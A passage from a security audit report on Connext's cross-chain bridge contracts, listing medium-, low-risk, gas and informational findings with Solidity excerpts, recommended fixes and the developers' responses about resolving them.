consistent with other swap functions which check that the amount transferred is equal to dx. As a result, overwriting dx with tokenFrom.balanceOf(address(this)).sub(beforeBalance) allows for fee-on- transfer tokens to work as intended. Recommendation: Consider adding a require(dx == tokenFrom.balanceOf(address(this)).sub(beforeBalance), "not support fee token"); check prior to overwriting dx to ensure fee-on-transfer tokens are not used in the swap. Connext: Solved in PR 1642, in this commit. Spearbit: Verified. +5.3.2 xcall() may erroneously overwrite prior calls to bumpTransfer() Severity: Medium Risk Context: BridgeFacet.sol#L380-L386, BridgeFacet.sol#L313 Description: The bumpTransfer() function allows users to increment the relayer fee on any given transferId without checking if the unique transfer identifier exists. As a result, a subsequent call to xcall() will overwrite the s.relayerFees mapping, leading to lost funds. Recommendation: Consider adding a check in bumpTransfer() to ensure _transferId exists. This mitigation can be implemented in a similar fashion to PromiseRouter.bumpCallbackFee(). It is important to note that check- ing for a non-zero s.relayerFees is not sufficient as xcall() accepts a zero values. Alternatively, it may be more succinct to modify xcall() such that s.relayerFees is incremented instead of overridden. Connext: Solved in PR 1643. Spearbit: Verified. Note: remaining risk bumpTransfer() allow adding funds to an invalid transferId. This is comparable to transfer- ring tokens to the wrong address. +5.3.3 _handleExecuteLiquidity doesn’t consistently check for receiveLocalOverrides Severity: Medium Risk Context: BridgeFacet.sol#L571-L638 Description: The function _handleExecuteLiquidity() initially checks for receiveLocal but does not check for receiveLocalOverrides. Later on it does check for both of values. function _handleExecuteLiquidity(... ) ... { ... if ( !_args.params.receiveLocal && // doesn't check for receiveLocalOverrides s.routerBalances[_args.routers[0]][_args.local] < toSwap && s.aavePool != address(0) ) { ... if (_args.params.receiveLocal || s.receiveLocalOverrides[_transferId]) { // extra check return (toSwap, _args.local); } } 22 As a result, the portal may pay the bridge user in the adopted asset when they opted to override this behaviour to avoid slippage conditions outside of their boundaries, potentially leading to an unwarranted reception of funds denominated in the adopted asset. Recommendation: Consider adding a check for receiveLocalOverrides to the Aave portal eligibility check. Connext: Solved in PR 1644. Spearbit: Verified. +5.3.4 Router signatures can be replayed when executing messages on the destination domain Severity: Medium Risk Context: BridgeFacet.sol#L476-496 Description: Connext bridge supports near-instant transfers by allowing users to pay a small fee to routers for providing them with liquidity. Gelato relayers are tasked with taking in bids from liquidity providers who sign a message consisting of the transferId and path length. The path length variable only guarantees that the message they signed will only be valid if _args.routers.length - 1 routers are also selected. However, it does not prevent Gelato relayers from re-using the same signature multiple times. As a result, routers may unintentionally provide more liquidity than expected. Recommendation: Consider ensuring that a router’s signed message can only be used once for a given trans- ferId. It may be useful to track these in a boolean mapping. Connext: Solved in PR 1626. Spearbit: Verified. Note: this still assumes that the sequencer is a centralized role maintained by the Connext team. We understand that this will be addressed in future on-chain changes to incentivize honest behavior and further decentralize the sequencer role. Connext: Currently the sequencer is a centralized role, and will be decentralized in the future. Consider that the only ’attack vector’ here (really more of a griefing vector) is that the sequencer has only the potential to favor certain routers over others, and cannot steal anyone’s funds. Additionally, we know that the ’ran- domness’ of the sequencer selection - while not strictly enforceable on-chain - will at the very least be demonstrated publicly; anyone can check to see that our sequencer has been behaving politely (simply check the distribution of router-usage over time, it should be relatively even). So it should be okay to continue this in a centralized manner for the time being, since funds are not jeopardized, and the only trust vector here is that we continue to select routers fairly to make sure everyone gets a fair share of profits. For clarity’s sake: the model towards decentralization will probably involve ’fair selection’ being enforceable through staking/slashing in the future. +5.3.5 diamondCut() allows re-execution of old updates Severity: Medium Risk Context: LibDiamond.sol#L95-L119 Description: The function diamondCut() of LibDiamond verifies the signed version of the update parameters. It checks the signed version is available and a sufficient amount of time has passed. However it doesn’t prevent multiple executions and the signed version stays valid forever. This allows old updates to be executed again. Assume the following: • facet_x (or function_y) has value: version_1. • then: replace facet_x (or function_y) with version_2. • then a bug is found in version_2 and it is rolled back with: replace facet_x (or function_y) with ver- sion_1. 23 • then a (malicious) owner could immediately do: replace facet_x (or function_y) with version_2 (be- cause it is still valid). Note: the risk is limited because it can only executed by the contract owner, however this is probably not how the mechanism should work. library LibDiamond { function diamondCut(...) ... { ... uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time < block.timestamp, "LibDiamond: delay not elapsed"); ... } } Recommendation: Consider doing the following: • Add a validity period for updates; • Remember which updates have been executed and prevent re-execution; • Add a nonce (for cases where a re-execution is wanted). Connext: Solved in PR 1576. Spearbit: Verified. +5.3.6 Not always safeApprove(..., 0) Severity: Medium Risk Context: AssetLogic.sol#L263-L295, Executor.sol#L142-L339 NomadFacet.sol#L176-L242, AssetLogic.sol#L308-L362, PortalFacet.sol#L179-L197, Description: Some functions like _reconcileProcessPortal of BaseConnextFacet and _swapAssetOut of As- setLogic do safeApprove(..., 0) first. contract NomadFacet is BaseConnextFacet { function _reconcileProcessPortal( ... ) ... { ... // Edge case with some tokens: Example USDT in ETH Mainnet, after the backUnbacked call there ,! could be a remaining allowance if not the whole amount is pulled by aave. // Later, if we try to increase the allowance it will fail. USDT demands if allowance is not 0, ,! it has to be set to 0 first. // Example: ,! ,! [ParaSwapRepayAdapter.sol#L138-L140](https://github.com/aave/aave-v3-periphery/blob/ca184e5278bcbc1 0d28c3dbbc604041d7cfac50b/contracts/adapters/paraswap/ParaSwapRepayAdapter.sol#L138-L140) c SafeERC20.safeApprove(IERC20(adopted), s.aavePool, 0); SafeERC20.safeIncreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount); ... } } While the following functions don’t do this: • xcall of BridgeFacet. • _backLoan of PortalFacet. • _swapAsset of AssetLogic. • execute of Executor. This could result in problems with tokens like USDT. 24 contract BridgeFacet is BaseConnextFacet { ,! function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) { ... SafeERC20.safeIncreaseAllowance(IERC20(bridged), address(s.bridgeRouter), bridgedAmt); ... } } contract PortalFacet is BaseConnextFacet { function _backLoan(...) ... { ... SafeERC20Upgradeable.safeIncreaseAllowance(IERC20Upgradeable(_asset), s.aavePool, _backing + ,! _fee); ... } } library AssetLogic { function _swapAsset(...) ... { ... SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount); ... } } contract Executor is IExecutor { function execute( ... ) ... { ... SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); ... } } Recommendation: Consider adding safeApprove(..., 0). Connext: Solved in PR 1550. Spearbit: Verified. +5.3.7 _slippageTol does not adjust for decimal differences Severity: Medium Risk Context: AssetLogic.sol#L273 Description: Users set the slippage tolerance in percentage. The assetLogic calculates: minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR Then assetLogic uses minReceived in the swap functions. The minReceived, however, does not adjust for the decimal differences between assetIn and assetOut. Users will either always hit the slippage or suffer huge slippage when assetIn and assetOut have a different number of decimals. Assume the number of decimals of assetIn is 6 and the decimal of assetOut is 18. The minReceived will be set to 10ˆ-12 smaller than the correct value. Users would be vulnerable to sandwich attacks in this case. Assume the number of decimals of assetIn is 18 and the number of decimals of assetOut is 6. The minReceived will be set to 10ˆ12 larger than the correct value. Users would always hit the slippage and the cross-chain transfer will get stuck. 25 library AssetLogic { function _swapAsset(... ) ... { // Swap the asset to the proper local asset uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR; ... return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut); ... } } Recommendation: Recommend to adjust the value with swapStorage.tokenPrecisionMultipliers for internal swap. For the external swap, the value should be adjusted according to token.decimals. Connext: Solved in PR 1574. Spearbit: Verified. +5.3.8 Canonical assets should be keyed on the hash of domain and id Severity: Medium Risk Context: L113, TokenRegistry.sol#L334 LibConnextStorage.sol#L184, AssetLogic.sol#L36, AssetFacet.sol#L143, TokenRegistry.sol#L112- Description: A canonical asset is a tuple of a (domain, id) pair. TokenRegistry’s owner has the power to regis- ter new tokens in the system (See TokenRegistry.ensureLocalToken() and TokenRegistry.enrollCustom()). A canonical asset is registered using the hash of its domain and id (See TokenRegistry._setCanonicalToRepre- sentation()). Connext uses only the id of a canonical asset to uniquely identify. Here are a few references: • swapStorages • canonicalToAdopted It is an issue if TokenRegistry registers two canonical assets with the same id. canonical asset an unintended one might be transferred to the destination chain, of the transfers may revert. If this id fetches the incorrect Recommendation: Consider using the keccak256 hash of canonical asset’s domain and id for mapping keys. Connext: Solved in PR 1588. Spearbit: Verified. +5.3.9 Missing checks for Chainlink oracle Severity: Medium Risk Context: ConnextPriceOracle.sol#L98, ConnextPriceOracle.sol#L153 Description: ConnextPriceOracle.getTokenPrice() function goes through a series of oracles. At each step, it has a few validations to avoid incorrect price. If such validations succeed, the function returns the non-zero oracle price. For the Chainlink oracle, getTokenPrice() ultimately calls getPriceFromChainlink() which has the following validation — if (answer == 0 || answeredInRound < roundId || updateAt == 0) { // answeredInRound > roundId ===> ChainLink Error: Stale price // updatedAt = 0 ===> ChainLink Error: Round not complete return 0; } updateAt refers to the timestamp of the round. This value isn’t checked to make sure it is recent. 26 Additionally, it is important to be aware of the minAnswer and maxAnswer of the Chainlink oracle, these values are not allowed to be reached or surpassed. See Chainlink API reference for documentation on minAnswer and maxAnswer as well as this piece of code: OffchainAggregator.sol Recommendation: • Determine the tolerance threshold for updateAt. If block.timestamp - updateAt exceeds that threshold, return 0 which is consistent with how the current validations are handled. • Consider having off-chain monitoring to identify when the market price moves out of [minAnswer, maxAn- swer] range. Connext: Recency check is implemented in PR 1602. Off chain monitoring will be considered. Spearbit: Verified and acknowledged. +5.3.10 Same params.SlippageTol is used in two different swaps Severity: Medium Risk Context: BridgeFacet.sol#L299-L304 BridgeFacet.sol#L637 In order Description: The Connext protocol does a cross-chain transfer with the help of the Nomad protocol. to use the Nomad protocol, Connext has to convert the adopted token into the local token. For a cross-chain transfer, users take up two swaps. Adopted -> Local at the source chain and Local -> Adopted at the destination chain. BridgeFacet.sol#L299-L304 function xcall(XCallArgs calldata _args) external payable whenNotPaused nonReentrant returns (bytes32) { ... // Swap to the local asset from adopted if applicable. (uint256 bridgedAmt, address bridged) = AssetLogic.swapToLocalAssetIfNeeded( canonical, transactingAssetId, amount, _args.params.slippageTol ); ... } BridgeFacet.sol#L637 function _handleExecuteLiquidity( bytes32 _transferId, bytes32 _canonicalId, bool _isFast, ExecuteArgs calldata _args ) private returns (uint256, address) { ... // swap out of mad* asset into adopted asset if needed return AssetLogic.swapFromLocalAssetIfNeeded(_canonicalId, _args.local, toSwap, _args.params.slippageTol); ,! } The same slippage tolerance _args.params.slippageTol is used in two swaps. In most cases users cannot set the correct slippage tolerance to protect two swaps. Assume the Nomad asset is slightly cheaper in both chains. 1 Nomad asset equals 1.01 adopted asset. An expected swap would be:1 adopted -> 1.01 Nomad asset -> 1 adopted. The right slippage tolerance should be set at 1.01 and 0.98 respectively. Users cannot set the correct tolerance with a single parameter. This makes users vulnerable to MEV searchers. Also, user transfers get stuck during periods of instability. Recommendation: Allow users to set two different slippage tolerance for the two swaps. 27 Connext: Solved in PR 1575. Spearbit: Verified. 5.4 Low Risk +5.4.1 getTokenPrice() returns stale token prices Severity: Low Risk Context: ConnextPriceOracle.sol#L88-L107 Description: getTokenPrice() reads from the assetPrices[tokenAddress].price mapping which stores the latest price as configured by the protocol admin in setDirectPrice(). However, the check for a stale token price will never fallback to other price oracles as tokenPrice != 0. Therefore, the stale token price will be unintentionally returned. Recommendation: If assetPrices[tokenAddress].updatedAt is considered stale, consider setting tokenPrice to zero such that the function attempts to query the fallback oracles. Connext: Solved in PR 1647. Spearbit: Verified. +5.4.2 Potential division by zero if gas token oracle is faulty Severity: Low Risk Context: SponsorVault.sol#L250-L252 Description: In the event that the gas token oracle is faulty and returns malformed values, the call to reim- burseRelayerFees() in _handleExecuteTransaction() will fail. Fortunately, the low-level call() function will not prevent the transfer from being executed, however, this may lead to further issues down the line if changes are made to the sponsor vault. Recommendation: Consider checking that den != 0 before calculating sponsoredFee. Connext: Solved in PR 1645. Spearbit: Verified. +5.4.3 Burn does not lower allowance Severity: Low Risk Context: BridgeRouter.sol#L252-L280, BridgeToken.sol#L62-L64 Description: The function _takeTokens() of BridgeRouter takes in the tokens from the sender. Sometimes it transfers them and sometimes it burns them. In the case of burning the tokens, the allowance isn’t "used up". 28 function _takeTokens(... ) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... IERC20(_token).safeTransferFrom(msg.sender, address(this), _amount); ... } else { ... _t.burn(msg.sender, _amount); ... } ... // doesn't use up the allowance } contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 { ... function burn(address _from, uint256 _amnt) external override onlyOwner { _burn(_from, _amnt); } } Recommendation: Consider using a function like the OZ BurnFrom() which does use up the allowance. Connext: The BridgeRouter basically has unlimited allowance for BridgeTokens, by design. The user doesn’t allow the Bridge to burn tokens, and so there is no allowance to reduce. Spearbit: Acknowledged +5.4.4 Two step ownership transfer Severity: Low Risk Context: ConnextPriceOracle.sol#L221-L226, BridgeRouter.sol#L479-L486 Description: The function setAdmin() transfer ownership to a new address. In case a wrong address is supplied ownership is inaccessible. The same issue occurs with transferOwnership of OwnableUpgradeable in several Nomad contracts. Additionally the Nomad contract try to prevent renounceOwnership, however, this can also be accomplished with transferOwnership to a non existing address. Relevant Nomad contracts: • TokenRegistry.sol • NomadBase.sol • UpdaterManager.sol • XAppConnectionManager.sol 29 contract ConnextPriceOracle is PriceOracle { ... function setAdmin(address newAdmin) external onlyAdmin { address oldAdmin = admin; admin = newAdmin; emit NewAdmin(oldAdmin, newAdmin); } } contract BridgeRouter is Version0, Router { ... /** * @dev should be impossible to renounce ownership; * * */ we override OpenZeppelin OwnableUpgradeable's implementation of renounceOwnership to make it a no-op function renounceOwnership() public override onlyOwner { // do nothing } } Recommendation: Consider implementing a two step ownership transfer. Connext: Will not change for BridgeRouter. Solved for the PriceOracle in PR 1605. Spearbit: Acknowledged and verified. +5.4.5 Function removeRouter does not clear approvedForPortalRouters Severity: Low Risk Context: RoutersFacet.sol#L293-L325, LibConnextStorage.sol#L104-L111 Description: The function removeRouter() clears most of the fields of the struct RouterPermissionsManagerInfo except for approvedForPortalRouters. However, it is still good to also remove approvedForPortalRouters in removeRouter() because if the router were to be added again later (via setupRouter() ) or _isRouterOwnershipRenounced is set in the future, the router would still have the old approvedForPortalRouters. 30 struct RouterPermissionsManagerInfo { mapping(address => bool) approvedRouters; // deleted mapping(address => bool) approvedForPortalRouters; // not deleted mapping(address => address) routerRecipients; // deleted mapping(address => address) routerOwners; // deleted mapping(address => address) proposedRouterOwners; // deleted mapping(address => uint256) proposedRouterTimestamp; // deleted } contract RoutersFacet is BaseConnextFacet { function removeRouter(address router) external onlyOwner { ... s.routerPermissionInfo.approvedRouters[router] = false; ... s.routerPermissionInfo.routerOwners[router] = address(0); ... s.routerPermissionInfo.routerRecipients[router] = address(0); ... delete s.routerPermissionInfo.proposedRouterOwners[router]; delete s.routerPermissionInfo.proposedRouterTimestamp[router]; } } Recommendation: In function removeRouter also clear approvedForPortalRouters. Connext: Solved in PR 1586. Spearbit: Verified. +5.4.6 Anyone can self burn lp token of the AMM Severity: Low Risk Context: LPToken.sol Description: When providing liquidity into the AMM pool, users get LP tokens. Users can redeem their shares of the liquidity by redeeming LP to the AMM pool. The current LPToken contract inherits Openzepplin’s ERC20BurnableUpgradeable. Users can burn their tokens by calling burn without notifying the AMM pools. ERC20BurnableUpgradeable.sol#L26-L28. Although users do not profit from this action, it brings up concerns such as: • An exploiter has an easy way to pump the LP price. Burning LP is similar to donating value to the pool. While it’s good for the pool, this gives the exploiter another tool to break other protocols. After the cream finance attack many protocols started to take extra caution and made this a restricted function (absorbing donation) github.com/yearn/yearn-security/blob/master/disclosures/2021-10-27.md. • Against the best practice. Every state of an AMM is related to price. Allowing external actors to change the AMM states without notifying the main contract is dangerous. It’s also harder for a developer to build other novel AMM based on the same architecture. Note: the burn function is also not protected by nonReentrant or whenNotPaused. Recommendation: Add an onlyOwner modifier. Only the AMM pool should be able to burn LP tokens. Connext: Solved in PR 1606. Spearbit: Verified. 31 +5.4.7 Skip timeout in diamondCut() (edge case) Severity: Low Risk Context: LibDiamond.sol#L95-L119 Description: Edge case: If someone manages to get an update through which deletes all facets then the next update skips the delay (because ds.facetAddresses.length will be 0). library LibDiamond { function diamondCut(...) ... { ... if (ds.facetAddresses.length != 0) { uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time < block.timestamp, "LibDiamond: delay not elapsed"); } // Otherwise, this is the first instance of deployment and it can be set automatically ... } } Recommendation: Make it so the skipping of a timeout can only be done once, for example by setting a flag. Connext: Solved in PR 1607. Spearbit: Verified. +5.4.8 Limit gas for s.executor.execute() Severity: Low Risk Context: BridgeFacet.sol#L644-L718 Description: The call to s.executor.execute() in BridgeFacet might use up all available gas. In that case, the call to callback to report to the originator might not be called because the execution stops due an out of gas error. Note: the execute() function might be retried by the relayer so perhaps this will fix itself eventually. Note: excessivelySafeCall in Executor does limit the amount of gas. contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(...) ... { ... (bool success, bytes memory returnData) = s.executor.execute(...); // might use all available ,! gas ... // If callback address is not zero, send on the PromiseRouter if (_args.params.callback != address(0)) { s.promiseRouter.send(...); // might not have enough gas } ... } } Recommendation: Consider limiting the amount of gas sent to s.executor.execute(). Connext: It’s the responsibility of the relayer to do a proper gas estimate (and leave a bit of overhead). The user should have provided a sufficient fee (in ETH) on the sending chain for the relayer to be slightly generous in its gas estimation. If the call reverts (for any reason, including out of gas), the relayer can just call it again (perhaps pending another bump from the user in their gas fee). Spearbit: Acknowledged. 32 +5.4.9 Several external functions missing whenNotPaused mofifier Severity: Low Risk Context: BridgeFacet.sol#L380-L386, PortalFacet.sol#L80-L167 Description: The following functions don’t have a whenNotPaused modifier while most other external functions do. • bumpTransfer of BridgeFacet. • forceReceiveLocal of BridgeFacet. • repayAavePortal of PortalFacet. • repayAavePortalFor of PortalFacet. Without whenNotPaused these functions can still be executed when the protocol is paused. Recommendation: Doublecheck to see if whenNotPaused useful. Connext: Given earlier conclusions about portal repayment being taken out-of-band, we’re going to acknowledge but not fix repayAavePortal and repayAavePortalFor. bumpTransfer fixed (whenNotPaused was added) in PR 1377. forceReceiveLocal only modifies the state property to override whether to receive local token, and it’s permis- sioned. Doesn’t seem necessary to include whenNotPaused for this reason. Acknowledged on that front. Spearbit: Verified and acknowledged. +5.4.10 Gas griefing attack on callback execution Severity: Low Risk Context: PromiseRouter.sol#L250 Description: When the callback is executed on the source chain the following line can revert or consume all forwarded gas. In this case, the relayer wastes gas and doesn’t get the callback fee. ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData()); Recommendation: • Decide on a fixed gas stipend to forward to this call, so that even if it consumes all of it, the transaction still has enough to continue. • Enclose the call in a try-catch block. In case of a revert from callback, continue the execution and transfer the callback fee to msg.sender. Connext: Solved in PR 1610. Spearbit: Verified. +5.4.11 Callback fails when returnData is empty Severity: Low Risk Context: PromiseRouter.sol#L173 Description: If a transfer involves a callback, PromiseRouter reverts if returnData is empty. if (_returnData.length == 0) revert PromiseRouter__send_returndataEmpty(); However, the callback should be allowed in case the user wants to report the calldata execution success on the destination chain (_returnSuccess). Recommendation: Consider PromiseRouter.sol#L173. removing the revert when _returnData is empty. Delete the line at 33 Connext: Solved in PR 1587. Spearbit: Verified. 5.5 Gas Optimization +5.5.1 Redundant fee on transfer logic Severity: Gas Optimization Context: PortalFacet.sol#L124-L167, AssetLogic.sol#L66-L90, AssetLogic.sol#L108-L118 Description: The function repayAavePortalFor() has logic for fee on transfer tokens. However, handleIncomin- gAsset() doesn’t allow fee on transfer tokens. So this extra code shouldn’t be necessary in repayAavePortal- For(). function repayAavePortalFor(...) ... { ... (, uint256 amount) = AssetLogic.handleIncomingAsset(_adopted, total, 0); ... // If this was a fee on transfer token, reduce the total if (amount < total) { uint256 missing; unchecked { missing = total - amount; } if (missing < _feeAmount) { // Debit fee amount unchecked { _feeAmount -= missing; } } else { // Debit backing amount unchecked { missing -= _feeAmount; } _feeAmount = 0; _backingAmount -= missing; } } ... } library AssetLogic { function handleIncomingAsset(...) ... { ... // Transfer asset to contract trueAmount = transferAssetToContract(_assetId, _assetAmount); .... } function transferAssetToContract(address _assetId, uint256 _amount) internal returns (uint256) { ... // Validate correct amounts are transferred uint256 starting = IERC20(_assetId).balanceOf(address(this)); SafeERC20.safeTransferFrom(IERC20(_assetId), msg.sender, address(this), _amount); // Ensure this was not a fee-on-transfer token if (IERC20(_assetId).balanceOf(address(this)) - starting != _amount) { revert AssetLogic__transferAssetToContract_feeOnTransferNotSupported(); } ... } } 34 Recommendation: Double check the fee on transfer handling. Connext: Solved in PR 1550. Spearbit: Verified. +5.5.2 Some gas can be saved in reimburseLiquidityFees Severity: Gas Optimization Context: SponsorVault.sol#L197-L226 Description: Some gas can be saved by assigning tokenExchange before the if statement. This also improves readability. function reimburseLiquidityFees(...) ... { ... if (address(tokenExchanges[_token]) != address(0)) { // could use `tokenExchange` ITokenExchange tokenExchange = tokenExchanges[_token]; // do before the if } Recommendation: Assign tokenExchange before the if statement. Connext: Solved in PR 1654. Spearbit: Verified. +5.5.3 LIQUIDITY_FEE_DENOMINATOR could be a constant Severity: Gas Optimization Context: BridgeFacet.sol, PortalFacet.sol, AssetLogic.sol Description: The value of LIQUIDITY_FEE_DENOMINATOR seems to be constant. However, it is currently stored in s and requires an SLOAD operation to retrieve it, increasing gas costs. upgrade-initializers/DiamondInit.sol: BridgeFacet.sol: BridgeFacet.sol: PortalFacet.sol: AssetLogic.sol: s.LIQUIDITY_FEE_DENOMINATOR = 10000; toSwap = _getFastTransferAmount(..., s.LIQUIDITY_FEE_DENOMINATOR); s.portalFeeDebt[_transferId] = ... / s.LIQUIDITY_FEE_DENOMINATOR; if (_aavePortalFeeNumerator > s.LIQUIDITY_FEE_DENOMINATOR) ... uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR; Recommendation: Consider creating a constant for LIQUIDITY_FEE_DENOMINATOR. Connext: Solved in PR 1660. Spearbit: Verified. +5.5.4 Access elements from storage array instead of loading them in memory Severity: Gas Optimization Context: SwapUtils.sol#L1016-L1034 Description: SwapUtils.removeLiquidityOneToken() function only needs the length and one element of the storage array self.pooledTokens. For this, the function reads the entire array in memory which costs extra gas. IERC20[] memory pooledTokens = self.pooledTokens; ... uint256 numTokens = pooledTokens.length; ... pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); 35 Recommendation: Consider using the storage array self.pooledTokens directly: - IERC20[] memory pooledTokens = self.pooledTokens; ... - uint256 numTokens = pooledTokens.length; + uint256 numTokens = self.pooledTokens.length; ... - pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); + self.pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); Connext: Solved in PR 1600. Spearbit: Verified. +5.5.5 Send information through calldata instead of having callee query Executor Severity: Gas Optimization Context: Executor.sol#L35-L60, Executor.sol#L201-L211 The contract (henceforth referred to as callee) called by Executor.sol should check Description: Executor.originSender(), Executor.origin(), and Executor.amount() to permission crosschain calls. This costs extra gas because of staticcall’s made to an external contract. Recommendation: Pass originSender, origin, and amount as part of the calldata to the callee to save the three external calls. Reading from calldata is cheaper instead. Connext: Solved in PR 1648. Spearbit: Verified. 5.6 Informational +5.6.1 AAVE portal debt might not be repaid in full if debt is converted to interest paying Severity: Informational Context: NomadFacet.sol#L176-L256 BridgeFacet.sol#L599-L608, BridgeFacet.sol#L723-L748, NomadFacet.sol#L146-L150, Description: The Aave portal mechanism gives routers access to a limited amount of unbacked debt which is to be used when fronting liquidity for cross-chain transfers. The process for receiving unbacked debt is as follows: • During message execution, the protocol checks if a single liquidity provider has bid on a liquidity auction which is handled by the relayer network. • If the provider has insufficient liquidity, the protocol attempts to utilize AAVE unbacked debt by minting uncol- lateralised aTokens and withdrawing them from the pool. The withdrawn amount is immediately used to pay out the recipient of the bridge transfer. • Currently the debt is fixed fee, see arc-whitelist-connext-for-v3-portals, however this might be changed in the future out of band. • Incase this would be changed: upon repayment, AAVE will actually expect unbackedDebt + fee + aToken interest. The current implementation will only track unbackedDebt + fee, hence, the protocol will accrue bad debt in the form of interest. Eventually, the extent of this bad debt will reach a point where the unbacked- MintCap has been reached and noone is able to pay off this debt. I consider this to be a long-term issue that could be handled in a future upgrade, however, it is important to highlight and address these issues early. Recommendation: Ensure this is documented and potentially add a function to allow anyone to pay off out-of- band Aave debt. It may also make sense to use part of the fee paid out to the protocol and LPs to pay off aToken 36 interest. However, the more equitable approach would be to expect routers to pay off their own interest. This serves as an incentive to pay off unbacked debt as soon as possible. Connext: As a note, we plan on upgrading the portal implementation to make it more amenable to these types of issues in future versions outlined here Spearbit: Acknowledged. +5.6.2 Routers pay the slippage cost for users when using AAVE credit Severity: Informational Context: BridgeFacet.sol#L723-L748 transfer with AAVE’s credit users get s.aavePortalFeeNumerator Description: When routers do the fast of adopted token and _fastTransferAmount = * _fastTransferAmount /s.LIQUIDITY_FEE_DENOMINATOR _args.amount * s.LIQUIDITY_FEE_NUMERATOR / s.LIQUIDITY_FEE_DENOMINATOR. The routers get reimbursed _args.amount of local tokens afterward. Thus, the routers lose money if the slippage of swapping between local tokens and adopted tokens are larger than the liquidityFee. function _executePortalTransfer( bytes32 _transferId, bytes32 _canonicalId, uint256 _fastTransferAmount, address _router ) internal returns (uint256, address) { // Calculate local to adopted swap output if needed address adopted = s.canonicalToAdopted[_canonicalId]; ,! ,! ,! IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); // Improvement: Instead of withdrawing to address(this), withdraw directly to the user or executor to save 1 transfer uint256 amountWithdrawn = IAavePool(s.aavePool).withdraw(adopted, _fastTransferAmount, address(this)); if (amountWithdrawn < _fastTransferAmount) revert BridgeFacet__executePortalTransfer_insufficientAmountWithdrawn(); // Store principle debt s.portalDebt[_transferId] = _fastTransferAmount; // Store fee debt s.portalFeeDebt[_transferId] = (s.aavePortalFeeNumerator * _fastTransferAmount) / s.LIQUIDITY_FEE_DENOMINATOR; ,! emit AavePortalMintUnbacked(_transferId, _router, adopted, _fastTransferAmount); return (_fastTransferAmount, adopted); } Recommendation: Routers should monitor local tokens’ peg and stop using AAVE’s liquidity when the price is off. Connext: Yes this is true -- and they can engage in the monitoring offchain. There is also an option for them to back the loan with the adopted asset directly, so they can more fine-tune their impact due to slippage. Spearbit: Acknowledged. 37 +5.6.3 Optimize max checks in initializeSwap() Severity: Informational Context: SwapAdminFacet.sol#L107-L175 Description: The function initializeSwap() reverts if a value is >= ...MAX.... Probably should revert when > ...MAX.... function initializeSwap(...) ... { ... // Check _a, _fee, _adminFee, _withdrawFee parameters if (_a >= AmplificationUtils.MAX_A) revert SwapAdminFacet__initializeSwap_aExceedMax(); if (_fee >= SwapUtils.MAX_SWAP_FEE) revert SwapAdminFacet__initializeSwap_feeExceedMax(); if (_adminFee >= SwapUtils.MAX_ADMIN_FEE) revert SwapAdminFacet__initializeSwap_adminFeeExceedMax(); ... } Recommendation: Change >= to >. Connext: The values are set to specific whole numbers within SwapUtils, so code can stay as is. Spearbit: Acknowledged. +5.6.4 All routers share the same AAVE debt Severity: Informational Context: BridgeFacet.sol#L723-L748 Description: The mintUnbacked amount is allocated to the calling contract (eg the Connext Diamond that has the BRIDGE role permission). Thus it is not separated to different routers, if one router does not payback its debt (in time) and has the max debt then this facility cannot be used any more. function _executePortalTransfer( ... ) ... { ... IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); ... } Recommendation: Consider having a separate authorized contract per router, which has the right to borrow from AAVE. Connext: A future improvement for the protocol will be around the experience of being an LP and how the contract custodies funds. One of the improvements would be thinking of funds as having an internal and external source, and making that external source more modularized. This way AAVE could be one of various different external liquidity sources. How we are planning on handling this in production is only having one router who is registered for portals. That way the concerns around portals are constrained to a single router while we develop a better, more generalized solution. Acknowledge this as an issue, and it will be addressed onchain in future upgrades and by offchain policy until then. Spearbit: Acknowledged. 38 +5.6.5 Careful with fee on transfer tokens on AAVE loans Severity: Informational Context: BridgeLogic.sol#L110-L140, PortalFacet.sol#L179-L197 Description: The Aave function backUnbacked() does not account for fee on transfer tokens. If these happen to be used then the accounting might not be right. function _backLoan(...) ... { ... // back loan IAavePool(s.aavePool).backUnbacked(_asset, _backing, _fee); ... } library BridgeLogic { function executeBackUnbacked(... ) ... { ... reserve.unbacked -= backingAmount.toUint128(); reserve.updateInterestRates(reserveCache, asset, added, 0); IERC20(asset).safeTransferFrom(msg.sender, reserveCache.aTokenAddress, added); ... } } Recommendation: Be careful with fee on transfer tokens with Aave loans. Connext: I’m not aware of any tokens that have fees on one domain, and not on another, but we will make sure this is tracked against assets we add to the whitelist. Note: We removed support for fee on transfer tokens. Spearbit: Acknowledged. +5.6.6 Let getTokenPrice() also return the source of the price info Severity: Informational Context: ConnextPriceOracle.sol#L88-L107 Description: The function getTokenPrice() can get its prices information from multiple sources. For the caller it might be important to know which source was used. function getTokenPrice(address _tokenAddress) public view override returns (uint256) { } Recommendation: Consider returning an extra value which indicates the source. For example: direct, chainlink- oracle, dex-spot, v1PriceOracle, NA Connext: Solved in PR 1658. Spearbit: Verified. 39 +5.6.7 Typos in the comments of _swapAsset() and _swapAssetOut() Severity: Informational Context: AssetLogic.sol#L252-L362 Description: There are typos in the comments of _swapAsset() and _swapAssetOut(): * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAsset(... ) ... * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAssetOut(...) ... Recommendation: Update the comments: -@notice Swaps assetIn t assetOut +@notice Swaps assetIn to assetOut Connext: 